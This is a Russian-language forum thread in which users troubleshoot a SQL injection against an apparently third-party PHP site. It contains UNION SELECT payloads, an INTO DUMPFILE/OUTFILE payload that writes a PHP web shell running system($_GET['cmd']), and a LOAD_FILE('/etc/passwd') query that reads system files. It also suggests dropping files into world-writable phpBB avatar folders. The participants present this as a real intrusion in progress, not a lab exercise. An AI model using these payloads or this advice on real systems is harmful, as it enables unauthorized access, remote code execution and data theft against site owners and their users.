MaxFast я немогу разобраться,как залить експлоит и запустить.

помогите составить запрос заливки файла(имею file_priv=Y)

есть уязвимый пхп скрипт(sql inj)

id=x

структура запросса:

SELECT emb_name,emb_class,name FROM rp,gallery WHERE emb_id=x and emb_gallery=gallery_id

При запросе:

id=9999+union+select+1,2,3--

ошибка:

SELECT emb_content_name FROM rp_content WHERE emb_content_article=9999 union select 1,2,3-- AND emb_content_version=1 ORDER BY emb_content_secno -failed

вывод в 1 столбец

пишу

9999+union+select+'%3C?php%20system($_GET[%22cmd%22]);%20?%3E',null,null+into+DUMPFILE+'/полный/путь/до/моего/файла/х/test.php'/*-- файл не создается

Как правильно составить запрос?

может кавычки фильтруются?

у меня так работало вроде:

раскрутил double blind inj на 1 сайтике, сбрутил имена всех доступных баз данных, среди них есть и mysql. file_priv соответственно тоже есть. Пути никакие вообще не знаю, локального инклюда нету, скан портов на предмет сервака баз данных ничего хорошего не сказал.

Что сделать можно, кроме как брутить путь к конфигурационным файлам апача? А то что-то нет никакого желания брутить строки через двойную слепоту...

UP

ковычки не фильтруются

9999+union+select+null,'text',null+into+outfile+'/х/х/х/х/х/х/1.php'/*

файл не записывается и вылазит ошибка

QUERY «SELECT emb_name,emb_class,name FROM rp,gallery WHERE emb_id=9999 union select null,'text',null into outfile '/х/х/х/х/х/х/1.php'/* and emb_gallery=gallery_id» FAILED. OUR APOLOGIES. PLEASE COME AGAIN LATER!

Запрос:

9999+select+''+into+outfile+'/х/х/х/х/х/х/1.php'--+

Тоже файл не записывается и ошибка:

QUERY «SELECT emb_name,emb_class,name FROM rp,gallery WHERE emb_id=9999 select '' into outfile '/х/х/х/х/х/х/1.php'-- and emb_gallery=gallery_id» FAILED. OUR APOLOGIES. PLEASE COME AGAIN LATER!

magic qoutes may be?

'asd' просто отображает?

запрос

9999+union+select+'1',2,3--+

выводит в столбец просто 1

думаю ,что mq=off т.к.

запрос 9999+union+select+LOAD_FILE('/etc/passwd'),2,3--+ выполняется успешно и выводится этот файл.

Я вот подумал может нету прав у юзера на котором мускул запушен на запись в диру которую я ему подсовываю?как это можно провирить проверить?и как действовать в таком случае?

ЧТО Я ИМЕЮ:

1.Доступ ко всем бд серва(там есть Пхпадмин и таблица psa-похоже ,что это типо cpanel ,но адрес их адреса найти не удалось ровно также как и определить хостинг сайта)

2.Соответственно могу читать файлы.

3.На борту есть форум пхпбб, но в его дб не удалось обнаружить таблиц с юзерами(видать кудато в другое место пишутся)пытался прочитать скрипт реги ,но куда пишутся юзеры так и не обнаружил.

"blesse" в пхпбб есть директории на которые по умолчанию права 777, что то вроде папки для аватаров и т.д. пробуй залиться туда.

Да ,но в них как правило запрет на исполнение пхп скриптов